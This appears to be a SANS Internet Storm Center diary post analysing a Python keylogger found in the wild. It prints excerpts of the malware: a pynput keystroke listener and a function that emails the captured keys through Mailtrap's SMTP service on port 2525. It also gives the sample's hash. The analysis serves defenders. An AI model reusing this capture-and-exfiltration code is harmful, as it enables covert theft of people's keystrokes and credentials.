Python Keylogger Using Mailtrap.io, (Sat, Dec 23rd)

This post was originally published on this site

I found another Python keylogger… This is pretty common because Python has plenty of modules to implement this technique in a few lines of code:

from pynput import keyboard
from pynput.keyboard import Listener
...
keyboard_listener = keyboard.Listener(on_press=self.save_data)
with keyboard_listener:
    self.report()
    keyboard_listener.join()

This is not the most interesting part of the malicious script. When data (key presses) are collected, they must be exfiltrated to the attacker's C2. These days, Discord is very popular. I also found many abused Google Mail accounts.

But, in this case, the attacker used another popular online service: mailtrap.io[1]. This service is "an email sandbox to inspect and debug emails in staging, dev, and QA environments before sending them to recipients in production". You may register a free account and get an environment to get emails for free! Mailtrap will provide an authenticated SMTP server to send them emails. Here is the code from the malicious script:

def send_mail(self, email, password, message):
    sender = "Private Person <from@example.com>"
    receiver = "A Test User <to@example.com>"
    m = f"""
    Subject: main Mailtrap
    To: {receiver}
    From: {sender}

    Keylogger by aydinnyunusn"""

    m += message
    with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
        server.login(email, password)
        server.sendmail(sender, receiver, message)

Mailtrap accepts emails on the following ports: 25, 465, 587 or 2525. Strangely, the last port was used in the script because there are chances that it will be blocked in corporate environments. Otherwise, it's a nice way to fly below the radar…

Conclusion: another free online service (ab)used by attackers!

Script SHA256: 9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d/ with a VT score of 8/61[2]

[1] https://mailtrap.io
[2] https://www.virustotal.com/gui/file/9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.